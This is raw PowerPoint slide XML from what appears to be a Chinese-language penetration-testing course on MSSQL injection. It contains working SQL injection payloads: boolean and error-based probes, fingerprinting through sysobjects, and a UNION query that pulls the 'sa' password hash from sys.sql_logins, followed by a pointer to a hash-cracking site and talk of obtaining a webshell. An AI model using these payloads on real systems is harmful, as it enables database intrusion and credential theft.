                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=0' union select 1,2,(Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>master.dbo.fn_varbintohexstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>password_hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>)  from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sys.sql_logins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where name = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>')--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用函数强制转换为１６进制，以免受格式影响</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>格式：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0x0100(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>头部</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8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>＋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>位区分大小写的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>hash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0x0100 c92ad033 643a58fdef841b9a046d0eb96e96f2418440bd91 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cmd5.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>对应明文密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794BCE03-8D9E-4CE6-95DA-F6001CBAC070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906719" y="1499986"/>
            <a:ext cx="3655121" cy="698268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8C033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>利用总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8C033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4FFFE6-75ED-4B09-BE2A-F6514086A878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="2553904" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:ln w="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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC7A24F-753B-4100-8B1F-11F276541D43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829335" y="213690"/>
            <a:ext cx="7034264" cy="1181109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A9C85F-9306-4C2B-A0B1-669A43A3671E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829335" y="1499986"/>
            <a:ext cx="7077529" cy="292814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27095591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43840" y="335251"/>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基本使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369994" y="1844041"/>
            <a:ext cx="11452013" cy="34959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spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>MSSql的介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>MSSql</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Helvetica"/>
              </a:rPr>
              <a:t>是指微软的SQLServer数据库服务器，它是一个数据库平台，提供数据库的从服务器到终端的完整的解决方案，其中数据库服务器部分，是一个数据库管理系统，用于建立、使用和维护数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRP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endParaRPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>渗透角度介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSql</a:t>
            </a:r>
            <a:endPar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mn-ea"/>
            </a:endParaRP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mn-ea"/>
              </a:rPr>
              <a:t>Microsoft SQL Sever 分为很多个版本,随着版本的不断升级安全性也越来越高,对我们渗透过程中最喜欢的版本应该就是2008以前，在2008及其以后的版本数据库的权限已经不再是system,相对于MySQL这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>S</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mn-ea"/>
              </a:rPr>
              <a:t>ql显得强大许多，他众多的功能也给我们注入过程带来了便利，所以一般数据库为mssql支持多语句我们就考虑是不是应该直接拿下webshell。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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="853441"/>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报错注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1342814"/>
            <a:ext cx="11748347" cy="52502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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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1</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、判断注入点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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 id=1</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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          </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 [ id=1 </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and 1=1 </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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  </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返回正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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           [ id=1 </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and 1=2 </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  </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返回错误</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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2</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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断是否为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库：</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pP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语句：</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 id=1</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and exists(select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>返回正常为mssql</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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           [ id=1 </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and exists (select count(*) from </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sysobjects</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用法和上面的相同</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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3、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
